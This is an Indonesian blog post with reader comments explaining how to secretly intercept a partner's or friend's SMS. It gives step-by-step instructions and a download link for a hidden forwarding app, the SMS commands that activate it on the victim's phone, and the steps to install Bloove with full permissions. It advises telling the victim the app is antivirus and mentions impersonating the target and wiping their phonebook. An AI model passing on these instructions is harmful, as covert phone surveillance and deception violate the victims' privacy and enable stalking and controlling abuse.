Cara Menyadap Sms Pacar atau Teman

Cara Menyadap Sms Pacar – Kali ini saya akan coba share tentang cara menyadap sms pacar yang sering selingkuh biar ketahuan belangnya.Tetapi aku hanya akan menjelaskan kepada kalian cara menyadap sms. Menakutkan bila menyadap / sadap telepon,Postingan kali ini hanya sebagai hiburan saja. Jangan memakainya dengan maksud jahat karena perbuatan dosa kalian akan sangat besar.. :D
Cara Menyadap Sms Pacar atau Teman
Tujuannya, supaya kita bisa setia dengan pacar kita, tidak ada yg berani selingkuh, dan supaya tidak ada teman kita yang menghianati kepercayaan. Kalo aku sih… buat gebetan aja
Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :
1. download smsanywherelite.sis ( link download ada di bawah )
2. Instal aplikasi itu di HP kalian dan teman kalian
3.Begitu aplikasi ini diinstal, kalian tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya. Jika digunakan sebagai alat sadap. Berarti sang target kan jangan sampai mengetahui kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman kalian tidak akan tahu kan kalo smsnya disadap? Karena aplikasi ini belum
mendukung GUI (Graphics User Interface).
4. Siapkan ponsel korban kalian
5. Siapkan HP kamu yang akan menerima sms masuk dari korban.
6.Aktifkan aplikasi ini di ponsel korban dengan mengetik format
sms SA (spasi) (password) (spasi) ON
Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456,
ketikkan SA 123456 ON
kirim sms ini ke nomor ponsel kedua/ ponsel
kalian. Untuk mematikannya, ketik SA
123456 OFF ke nomor yang sama.
7.Lalu, jika kalian ingin menyadap lebih dari 5 hari atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms : SA (spasi) (password)(spasi) R1, misal SA 1234567 R1
Untuk mematikan fungsi ini ganti parameter dibelakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kalian. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
8.Sekarang, setiap korban menerima dan mengirim sms, kalian akan mendapat terusannya sama persis dengan sms aslinya.
Dengan begini, kita akan tahu apakah pacar kita selingkuh, atau apakah teman kita berkhianat dan lainnya.
Jika anda ingin download aplikasi di atas klik
[button link="http://adf.ly/1198780/http://bagaimana.pun.bz/files/smsanywher160513.sis" color="#AAAAAA" size="3" style="1" dark="0" square="0" target="blank"]download here[/button]
Saya akan mencoba tambahkan cara baru yang saya temukan di blog teman. lansung saja yah :

Cara Mudah Menyadap SMS

Bloove adalah salah satu website penyedia layanan untuk menyadap SMS dan telepon dari handphone yang kita miliki. Cara untuk menyadap SMS dan Telepon handphone dengan bloove ini saya dapat ketika salah satu bos saya minjam laptop kesayanganku. Katanya untuk transfer data. Penasaran, aku intip sejenak. Ternyata dia koneksi internet dan membuka situs www.bloove.com.
Apa itu Bloove ? Bloove adalah salah satu tokoh kartun tersexy yang pernah saya kenal. Hehehehe, Bercanda.
Dengan website Bloove ini kita bisa memata-matai penggunaan sms dan panggilan juga isi phonebook handphone baik milik pribadi maupun milik orang lain yang sudah kita daftarkan.
Berikut 2 keunggulan yang dimiliki oleh website penyedia layanan penyadap SMS dan telepon yaitu Bloove : 
Keunggulan pertama Bloove :
1. Bisa melihat semua panggilan & sms di hp kita lewat warnet, jika hp ketinggalan dirumah.
2. Bisa langsung balas sms lewat internet dengan sender tetap nomor kita
3. Bisa melacak pengguna hp kita kalo sewaktu-waktu hilang
Keunggulan kedua bloove, ini berguna kalo kita berniat memata-matai orang (pacar, teman, atau siapapun) kelebihannya :
1. Bisa melihat semua panggilan & sms di hp target lewat warnet atau komputer kita.
2. Bisa langsung balas sms menyebalkan lewat internet dengan sender tetap nomor target.
3. Yang paling jahat, kamu bisa hapus semua phonebook di hp target. Jangan sampai setega ini ya…
Berikut cara mendaftar bloove :
1. cek dulu apakah handphone yang mau disadap didukung gak ama situs ini.
2. bila didukung, unduh aplikasi clientnya di hape target agar dapat mengirim data ke situs bloove di http://bloove.com/m. lalu install di hape target.
3. setelah terinstall pilih icon Bloove Agent, tapi jangan dibuka terlebih dahulu, tapi tekan :
Option > Application access > Communication > Network access > Always allowed > Yes
Option > Application access > Communication > Messaging > Always allowed > Yes
Option > Application access > Communication > Connectivity > Always allowed > Yes
Option > Application access > Data access > Multimedia recording > Always allowed > Yes
Option > Application access > Data access > Read user data > Always allowed > Yes
Option > Application access > Data access > Add and edit data > Always allowed > Yes
Option > Application access > Data access > Smart card > Always allowed > Yes
Option > Application access > Auto-start > Always allowed > Yes
Setelah itu baru kita tekan icon Bloove Agent. setelah selesai catat ID yang muncul untuk registrasi yang formatnya XXXX-XXXX-XXXX.
4. lalu kembali gunakan komputer anda, lalu buka link ini : www.bloove.comdan klik Sign Up, isi ID yang sudah dicatat yang formatnya XXXX-XXXX-XXXX ke Agent ID & ikuti petunjuk dibawahnya.
5. Jika jaringan GPRS di hp target tidak hilang, maka kita langsung terhubung ke server yang sudah menerima data dari target. Secara otomatis server akan men-syncronize data di hp target dan ditampilkan di layar monitor. Dengan gambar hp target & tulisan “online”.
Kekurangan yang paling menggangu dari bloove ini, yaitu dia harus terus berjalan. jadi tidak boleh ditutup. jadi untuk menggunaan minimal harus di minimize. nah trik tambahan, untuk alasan kita semisal kita menggunakan aplikasi bloove agent di handphone orang lain, kita bisa katakan kalau program ‘Bloove Agent‘ yang diinstall di handphone target tersebut adalah antivirus atau dengan cara apapun atau rayuan apapun. Asal jangan Rayuan gombal. Hahahahaha….
selain itu, aplikasi ini dalam rentang waktu yang dapat kita set sendiri harus koneksi ke server Bloove jadi sekali-kali dia akan otomatis koneksi gprs.
Selamat mencoba dan selamat menjadi agen rahasia dengan website untuk menyadap SMS dan telepon handphone seperti James Bond denganBloove ini.
Semoga bermanfaat yah postingan saya tentang Cara Menyadap Sms Pacar


Written by: wahyuddin


Artikel Terkait Lainnya:

4 Komentar:

DeeJay Dan'Char mengatakan...

gan pengiriman data dari hp korban membutuhkan pulsa dari si korban apa tidak..

Rizal Ramdhan Konohagakure mengatakan...

gan link nya ko not found sihh ??

Ani Kurnia mengatakan...

ada cara yang lebih mudahkah ??

yuthi karbu mengatakan...

Ada gak cara yang lebih simpel?

Yang nulis postingan di atas, udah coba blom? Ane ga yakin ama postingan u sobb

Poskan Komentar

 
Blog JavaCyber 2012 | All Rights Reserved